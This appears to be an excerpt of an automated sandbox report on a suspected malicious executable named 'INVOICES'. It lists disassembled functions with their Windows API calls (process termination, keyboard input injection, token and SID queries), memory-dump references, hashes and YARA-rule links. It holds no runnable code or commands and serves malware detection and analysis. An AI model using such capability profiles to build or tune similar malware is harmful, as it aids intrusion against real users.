                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4137160315-0
                                                                                                                                  • Opcode ID: b90b847667d1523b51ad97e79c44b33a02eeb82ea960a1e46db347246ed06480
                                                                                                                                  • Instruction ID: d18948fc505176626430ec9f4589bbd76ddbed4a3b1fd56ba9be10b03aa37bbe
                                                                                                                                  • Opcode Fuzzy Hash: b90b847667d1523b51ad97e79c44b33a02eeb82ea960a1e46db347246ed06480
                                                                                                                                  • Instruction Fuzzy Hash: C031F072108305ABC724DF14CC49F9BB7A9FF89704F004A29F88897191CB38EA08CB92
                                                                                                                                  Function 0079EBAF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
                                                                                                                                    • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
                                                                                                                                    • Part of subcall function 0074FE06: _wcscpy.LIBCMT ref: 0074FE29
                                                                                                                                  • _wcstok.LIBCMT ref: 0079ED20
                                                                                                                                  • _wcscpy.LIBCMT ref: 0079EDAF
                                                                                                                                  • _memset.LIBCMT ref: 0079EDE2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                  • String ID: X
                                                                                                                                  • API String ID: 774024439-3081909835
                                                                                                                                  • Opcode ID: 44a914860af62f847019f4f7c75ff08cc44e240ef91054653c79c6cb9b017c32
                                                                                                                                  • Instruction ID: 094507fe0e56699e272d5aa272b6561077c33d9e801550fb92490210eadb6cde
                                                                                                                                  • Opcode Fuzzy Hash: 44a914860af62f847019f4f7c75ff08cc44e240ef91054653c79c6cb9b017c32
                                                                                                                                  • Instruction Fuzzy Hash: A6C1A371608700DFDB64EF24D885A5AB7E4FF85314F04492DF899872A2DB78ED45CB82
                                                                                                                                  Function 00788B3B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 007883D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007883E8
                                                                                                                                    • Part of subcall function 007883D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007883F2
                                                                                                                                    • Part of subcall function 007883D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00788401
                                                                                                                                    • Part of subcall function 007883D1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00788408
                                                                                                                                    • Part of subcall function 007883D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0078841E
                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000000,00788757), ref: 00788B8C
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00788B98
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00788B9F
                                                                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00788BB8
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00788757), ref: 00788BCC
                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00788BD3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 169236558-0
                                                                                                                                  • Opcode ID: 912573d4e631e540bdbe960df1ef99c80b850ee462338ec976c3d51797bcbe1c
                                                                                                                                  • Instruction ID: 38df144e70b598af43811806c16faf8a11c65daa2bcd155782463b73bccc5b10
                                                                                                                                  • Opcode Fuzzy Hash: 912573d4e631e540bdbe960df1ef99c80b850ee462338ec976c3d51797bcbe1c
                                                                                                                                  • Instruction Fuzzy Hash: 2F11B1F1580208FFDB90AF68CC09FAE7BA9EF85725F508528E84597150DB399D00CB61
                                                                                                                                  Function 0078BA52 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 0078BA77
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0078BA88
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0078BA8F
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0078BA97
                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0078BAAE
                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0078BAC0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1035833867-0
                                                                                                                                  • Opcode ID: b870d03de368d13063e165da1a0e73eee1dd7b847ab204ec1138cf8383aa6dc0
                                                                                                                                  • Instruction ID: dc103b587d9d31c02ff6d2e1cfea2c7ceb0d66015902ec52c103369492635555
                                                                                                                                  • Opcode Fuzzy Hash: b870d03de368d13063e165da1a0e73eee1dd7b847ab204ec1138cf8383aa6dc0
                                                                                                                                  • Instruction Fuzzy Hash: 03017175A40218BBEB10ABA59D49F5EBFA8EB48711F008166FE08A7291D6349900CFA1
                                                                                                                                  Function 007502E2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00750313
                                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 0075031B
                                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00750326
                                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00750331
                                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00750339
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00750341
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4278518827-0
                                                                                                                                  • Opcode ID: 97af032ba25793d21ef91bcab3d00fc8d5e446880dd45a92f88ac4014d860d7a
                                                                                                                                  • Instruction ID: 12c4ff67ee73e7d33c919a264c448ebd9f7a5ebc5c3657b0869f4f408c23b1ab
                                                                                                                                  • Opcode Fuzzy Hash: 97af032ba25793d21ef91bcab3d00fc8d5e446880dd45a92f88ac4014d860d7a
                                                                                                                                  • Instruction Fuzzy Hash: C6016CB0901759BDE3008F5A8C85B52FFA8FF19754F00411BE15C47941C7F5A864CBE5
                                                                                                                                  Function 00795490 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007954A0
                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007954B6
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 007954C5
                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007954D4
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007954DE
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007954E5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 839392675-0
                                                                                                                                  • Opcode ID: 31ac676e8f4f64160f43d9cbef5641e51066a32c6b74ed70e32c84d9772fb9f0
                                                                                                                                  • Instruction ID: ddcab8e30a86f7b57b9b69ce3868dd7d8e2e6ae4520a3632054b223fab54046b
                                                                                                                                  • Opcode Fuzzy Hash: 31ac676e8f4f64160f43d9cbef5641e51066a32c6b74ed70e32c84d9772fb9f0
                                                                                                                                  • Instruction Fuzzy Hash: 72F01D32641158BBE7215BA69C0DFEB7B7CEBCAF15F004269FA04D10A096A91A0187B9
                                                                                                                                  Function 007972D9 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 007972EC
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 007972FD
                                                                                                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00741044,?,?), ref: 0079730A
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00741044,?,?), ref: 00797317
                                                                                                                                    • Part of subcall function 00796CDE: CloseHandle.KERNEL32(00000000,?,00797324,?,00741044,?,?), ref: 00796CE8
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0079732A
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00797331
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                  • Opcode ID: 82465cd7757894c7c1b689e890185e3d40189dc823cc05ad9c56dee7592b11b6
                                                                                                                                  • Instruction ID: f020d2846baa660f072eafa7ff9281ae3bb2bf1bef914012360f083e8ba10b38
                                                                                                                                  • Opcode Fuzzy Hash: 82465cd7757894c7c1b689e890185e3d40189dc823cc05ad9c56dee7592b11b6
                                                                                                                                  • Instruction Fuzzy Hash: 80F05E36140612EBEB121B64ED8CEDE772AFF49B02B404731F602910A0CB795811CBA4
                                                                                                                                  Function 007A8702 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007A8728
                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 007A8837
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 007A89AF
                                                                                                                                    • Part of subcall function 0079760B: VariantInit.OLEAUT32(00000000), ref: 0079764B
                                                                                                                                    • Part of subcall function 0079760B: VariantCopy.OLEAUT32(00000000,?), ref: 00797654
                                                                                                                                    • Part of subcall function 0079760B: VariantClear.OLEAUT32(00000000), ref: 00797660
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                  • API String ID: 4237274167-1221869570
                                                                                                                                  • Opcode ID: 7290276ba10b45f169ea6122e9de0d07ea84f3529c2f48075c06b2921e4740f1
                                                                                                                                  • Instruction ID: 65918445078a1831349811e383e74648a1436c83cd6539507a454348e326d15c
                                                                                                                                  • Opcode Fuzzy Hash: 7290276ba10b45f169ea6122e9de0d07ea84f3529c2f48075c06b2921e4740f1
                                                                                                                                  • Instruction Fuzzy Hash: 37915975608301DFC750DF24C48496BBBE4AFC9714F148A6EF89A8B362DB39E905CB52
                                                                                                                                  Function 00792D8E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0074FE06: _wcscpy.LIBCMT ref: 0074FE29
                                                                                                                                  • _memset.LIBCMT ref: 00792E7F
                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00792EAE
                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00792F61
                                                                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00792F8F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 4152858687-4108050209
                                                                                                                                  • Opcode ID: e2a0955afa224099ef2b12efd362be31b3f2984b19463e8136670319a97a562f
                                                                                                                                  • Instruction ID: b689c0de7eefcfb4cb15d912d5dfc96f416136b73d65b6974e46ad7eb7b355cc
                                                                                                                                  • Opcode Fuzzy Hash: e2a0955afa224099ef2b12efd362be31b3f2984b19463e8136670319a97a562f
                                                                                                                                  • Instruction Fuzzy Hash: 2251D271608301AEDB25FF28E849A6BB7F5AF45310F144A2DF894D21A2DB78CD16C792
                                                                                                                                  Function 0078D87B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0078D8E3
                                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0078D919
                                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0078D92A
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0078D9AC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                  • String ID: DllGetClassObject
                                                                                                                                  • API String ID: 753597075-1075368562
                                                                                                                                  • Opcode ID: e2d6ff8124b4477ad0e1f64af55b05a46c8b4a09177c0c9cb9d634e0f25cfc0d
                                                                                                                                  • Instruction ID: 7229a7739ff0926162b4e4bf971b78bd5dd5b3615deb4251ed3c551695f3813f
                                                                                                                                  • Opcode Fuzzy Hash: e2d6ff8124b4477ad0e1f64af55b05a46c8b4a09177c0c9cb9d634e0f25cfc0d
                                                                                                                                  • Instruction Fuzzy Hash: 134190B1640204EFDB25EF55C884B9A7BA9EF49714B1181ADEC05DF285D7B8ED40CBA0
                                                                                                                                  Function 00792A4B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00792AB8
                                                                                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00792AD4
                                                                                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00792B1A
                                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007F5890,00000000), ref: 00792B63
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 1173514356-4108050209
                                                                                                                                  • Opcode ID: d0185fab37b5155d69a69f33bf51b141c3d308fe5f7116d1af3a42eabfb5eb24
                                                                                                                                  • Instruction ID: e52c696fb24130615c8f93e0313c516f782d111a28facdc025237a6d438b85f8
                                                                                                                                  • Opcode Fuzzy Hash: d0185fab37b5155d69a69f33bf51b141c3d308fe5f7116d1af3a42eabfb5eb24
                                                                                                                                  • Instruction Fuzzy Hash: F741B471204301EFDB20EF24E885F5AB7E9AF85320F10465DF96597292D778E906CB62
                                                                                                                                  Function 00790E07 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105keyboardwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00790E58
                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00790E74
                                                                                                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00790EDA
                                                                                                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00790F2C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                  • String ID: MZER
                                                                                                                                  • API String ID: 432972143-2424380061
                                                                                                                                  • Opcode ID: 6890d832d882f123578f76a1b707e45b89e2a010d502bc0168f1b342020769a5
                                                                                                                                  • Instruction ID: eee59cb033e06474f5366b7146847dc11224b7548ca9be111d2243ffe308d79a
                                                                                                                                  • Opcode Fuzzy Hash: 6890d832d882f123578f76a1b707e45b89e2a010d502bc0168f1b342020769a5
                                                                                                                                  • Instruction Fuzzy Hash: EC315A30960218AEFF31DB24AC09BFE7BA5EF48310F18461AF4D0521D1C37D899597D5
